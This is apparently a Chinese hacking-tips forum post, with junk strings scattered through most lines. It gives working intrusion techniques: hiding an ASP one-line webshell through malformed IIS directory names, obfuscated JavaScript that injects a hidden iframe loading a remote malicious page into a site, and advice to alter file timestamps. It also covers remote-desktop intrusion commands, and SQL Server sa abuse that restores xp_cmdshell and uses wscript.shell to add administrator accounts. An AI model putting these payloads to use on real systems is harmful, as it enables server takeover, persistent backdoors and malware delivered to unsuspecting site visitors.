用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。 P3 n/ Y3 z9 v: S( @) S# e6 n; Z
, _0 u4 B2 Q5 J
53、隐藏ASP后门的两种方法5 o9 l0 d9 w: r1 j; Y
1、建立非标准目录:mkdir images..\
2 C( b/ J: T' G5 {拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
2 N9 x% @/ w/ ? F4 p* `通过web访问ASP木马:http://ip/images../news.asp?action=login
% I( K7 w& J# x E9 K; C如何删除非标准目录:rmdir images..\ /s
1 C. H, ^1 w. C2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:: |/ n/ t+ i# }& ^" l9 A$ n
mkdir programme.asp
( N, x# s: p \- i @; N( q, _新建1.txt文件内容:<!--#include file=”12.jpg”-->
, x; e. v/ _" W7 k, Z o新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件3 @' {, Z7 {- U( o7 ~& a) r+ P5 g& k# \# I
attrib +H +S programme.asp( `' R) i* J- l3 w: y" L, M' p
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt! F5 }% O# E/ P. o* X' T1 e3 V
/ U: S2 ]( N0 P4 F$ V& ~% D3 e54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。) v! @& g) L4 L8 r2 m
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
: u2 ]4 d* C9 e- V+ U i, ^+ e% @, ~8 {% b7 e3 q X# @1 e
55、JS隐蔽挂马( r1 g4 E4 o0 b3 G; }6 g% c% B7 }9 t
1.6 D. l" N* Q2 I6 {7 p* N
var tr4c3="<iframe src=ht";& \4 V: `4 n6 M" t
tr4c3 = tr4c3+"tp:/";& O& f. e2 {# Z
tr4c3 = tr4c3+"/ww";
6 r- z' {( k. p$ ^* vtr4c3 = tr4c3+"w.tr4";
1 F2 r' Z9 J( Xtr4c3 = tr4c3+"c3.com/inc/m";( |" b% n$ C3 Q" m6 z6 h% P7 J
tr4c3 = tr4c3+"m.htm style="display:none"></i";+ v% m- B6 t+ B6 R. E0 U
tr4c3 =tr4c3+"frame>'";* |$ H9 X2 `4 Y" k; g1 Z
document.write(tr4c3);
: U- {# s/ E, I避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
. ]3 t$ i' [' S/ `. ]1 T/ S
. X8 m& n9 g C: y; A' X+ f2.6 a9 w. I# f& ]
转换进制,然后用EVAL执行。如
$ O& K' n' D- s, K; K8 ?/ S& geval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
5 i J' r$ B: @- M0 j不过这个有点显眼。
9 v* A4 x, W8 L( |/ c n" h3.
5 \/ h0 x% I6 A! p- }document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');! X! |( G4 J6 Z
最后一点,别忘了把文件的时间也修改下。
- t1 _" T4 k8 G
3 Z# h& Q1 ~6 A0 C6 y2 M56.3389终端入侵常用DOS命令
8 h7 c4 a! Y; N4 y" Ztaskkill taskkill /PID 1248 /t
o% I# t' i) c! U* [0 {0 B
+ U9 b2 ]6 g! V, a% F: otasklist 查进程
8 c) |$ ?' v6 M- F) f/ C, g7 K, S) I8 z, ?/ t* K5 N
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限, {9 b2 y5 O$ L
iisreset /reboot
7 j) z- G5 X& t9 @+ Ktsshutdn /reboot /delay:1 重起服务器
0 \( f3 L6 y3 R+ C
9 `$ V' j$ z8 Ilogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
0 T$ x% N5 W5 Y' w, O
$ m1 @9 S/ s, [/ s( B) vquery user 查看当前终端用户在线情况
( M& M; ]9 q0 u- I% V
b% G# A K5 f2 S* Z7 N) @) w# y) K; |要显示有关所有会话使用的进程的信息,请键入:query process *
4 s, h& ~9 p* j( p
2 n. X6 d# E1 ?要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:20 S, O, L! p) J: O8 A3 X p( d- y
2 H. U& J: P7 r- X4 s# a! i+ d要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2: f' p4 i" N/ k2 }0 |
' o+ L0 s% f; `3 n( R# J5 C; O要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
# D4 X3 f! Q0 M" w. p
4 K r! M0 \7 h' g- g命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
& P' ^% W* V# n0 d e0 ~) D: D0 T
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
1 X8 F' F# N9 c) u8 w, s! W- s( j% o; c! g2 S% l
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; }9 m' |& h8 O' F r8 x
; w2 Y1 ^' X" n4 ~5 X命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
0 |' h6 |+ _+ ~! ]1 ~
/ o# n f+ E: B8 L7 H% \; M3 c( M56、在地址栏或按Ctrl+O,输入:
1 g: n/ v( y' \9 i/ b. D- @javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
. ^/ m( e8 ^% i1 L6 a" @7 w
! T9 t2 p/ C' E源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
' u' F* r u9 S; B6 |
( B! H. ~7 N( c$ h- k2 _) J& ~57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
4 N; `3 X6 n# z6 X7 c9 I5 D- \- a" R/ R用net localgroup administrators是可以看到管理组下,加了$的用户的。
# f P8 b4 E0 W9 J2 h: [- E, \. A. ~8 R& W+ q3 t
58、 sa弱口令相关命令
" C: h; Q, h+ f$ b+ t9 g! h" ~; `# T& S0 V0 n
一.更改sa口令方法:" B D h7 \0 D- V: G+ d- b
用sql综合利用工具连接后,执行命令:# l2 x/ V9 d0 y/ a. a( |1 O- w
exec sp_password NULL,'20001001','sa'
) B% p) k7 I/ N5 S; o(提示:慎用!)# G. n0 I/ f- d+ y5 R' g u1 f
& T5 W) ^ k, @. |; ^; K9 v: y二.简单修补sa弱口令.
, Y# _ }$ q0 S% _
6 k1 J% l4 J9 k8 b8 E Q方法1:查询分离器连接后执行:
3 g- B! p. {# P$ U) M9 zif exists (select * from E) O3 K1 U/ a* b: `
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
$ K% j! X7 H+ ^+ ]OBJECTPROPERTY(id, N'IsExtendedProc') = 1)' U% N2 Q! K+ i5 ~4 w' P& D1 }/ L
% `- |+ b, O$ t" B+ x
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'! Y! w. K$ F" B& n. s& d( r
% U. [5 }: j+ z8 u* l9 W1 iGO, b7 g- X0 J; J4 k
% H* m- L! \! \& Z8 }& \" I: u然后按F5键命令执行完毕) }& B; D# Y, N; U7 a2 ~- u- x: ], Y
+ ?5 Y7 W% G, p" h; R1 Q" b方法2:查询分离器连接后5 X( l6 I. Q+ m) P8 _: e
第一步执行:use master
. I8 o( m. p$ `' i( L第二步执行:sp_dropextendedproc 'xp_cmdshell'
" `, G# j, e: u( h. u( C$ G6 f. L然后按F5键命令执行完毕
' h8 M9 d2 x0 b2 q2 c6 s3 W& `
# M% M+ y8 ^: Q. i
& }; m. Q* a1 N; n三.常见情况恢复执行xp_cmdshell.
& k- o; A9 y6 J3 T9 F+ [1 b; V" G& N: Q; @% Y2 C
. Z5 B" Q% f. a1 f. ?& X5 @1 未能找到存储过程'master..xpcmdshell'.
( p z' M O; W) H. W/ K, X 恢复方法:查询分离器连接后,2 M1 A; _/ a8 ?& R* f. p
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( ^3 a0 }& R# V5 T z% g! B第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. t/ ]# g2 a4 u4 u6 T& I
然后按F5键命令执行完毕 N3 ^/ J5 `8 }9 F$ [0 R3 m: \
9 q4 \) X9 H' o- _2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
' a% h2 B% b1 y恢复方法:查询分离器连接后,4 f$ q" D& ~. f, ~' q9 U
第一步执行:sp_dropextendedproc "xp_cmdshell"
% O9 V/ t- K& C4 C1 M5 u第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'1 \' t, S1 h# I& i; {* C4 g
然后按F5键命令执行完毕
1 u2 I# m# [ c' s( l! B4 z4 _0 I9 ^! v% h+ o: i) F" U% a0 ~
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
- y; K Y6 e/ }. n; Z3 F1 m恢复方法:查询分离器连接后,
# k `* a2 j- f1 _5 y, c第一步执行:exec sp_dropextendedproc 'xp_cmdshell'$ Q$ W! _2 l" Y2 m% G# L
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
A1 M2 x% Q5 R% f% p! b+ Z! R然后按F5键命令执行完毕
$ H4 K7 D2 J6 ~& S/ Z" B/ B3 Y& Z( H# c$ R- J; f) P
四.终极方法." D2 ]3 R4 s$ }
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
5 ?5 y+ `. x4 _9 U4 N. o- c3 S查询分离器连接后,5 D/ c; e* f* H: U6 c8 B! v
2000servser系统:* f& Q7 ]* j) m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'7 R3 g& I7 s* I3 ~ B& D" c
& i7 |6 G3 f3 k. d# l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'+ p: z0 d. f6 \8 G; U: W, X6 a& M
2 T% R2 \6 a" y) I
xp或2003server系统:
$ v6 n! _( D' }- n, b+ }- u
# P. }8 O( i0 F5 W3 }! edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; N# d* O; A2 H6 N3 M
, q9 |' [" O2 t1 G/ ]5 E/ s3 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* {$ S5 O* t' c; t' P |